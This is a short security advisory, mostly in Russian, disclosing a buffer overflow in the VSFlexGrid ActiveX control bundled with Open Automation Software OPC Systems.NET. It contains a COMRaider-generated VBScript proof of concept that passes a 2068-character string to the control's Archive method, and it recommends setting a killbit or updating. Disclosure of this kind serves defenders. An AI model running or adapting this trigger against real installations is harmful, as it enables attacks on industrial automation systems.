DSECRG-12-006: Переполнение буфера
Вендор
OPC Systems
Продукт
Open Automation Software OPC Systems.NET
Тип уязвимости
Переполнение буфера
Reported
07.12.2011
Date of Public Advisory
20.01.2012
Детальное описание
<?XML version=’1.0′ standalone=’yes’ ?>
<package><job id=’DoneInVBS’ debug=’false’ error=’true’>
<object classid=’clsid:D76D712E-4A96-11D3-BD95-D296DC2DD072′ id=’target’ />
<script language=’vbscript’>
‘File Generated by COMRaider v0.0.133 — http://labs.idefense.com
‘Wscript.echo typename(target)
‘for debugging/custom prolog
targetFile = «C:\Program Files (x86)\Open Automation Software\OPC Systems.NET\Vsflex7.ocx»
prototype = «Sub Archive ( ByVal ArcFileName As String , ByVal FileName As String , ByVal Action As ArchiveSettings )»
memberName = «Archive»
progid = «VSFlex7.VSFlexGrid»
argCount = 3
arg1=String(2068, «A»)
arg2=»defaultV»
arg3=1
target.Archive arg1 ,arg2 ,arg3
</script></job></package>
Решение
Установите Killbit или загрузите обновление от стороннего разработчика.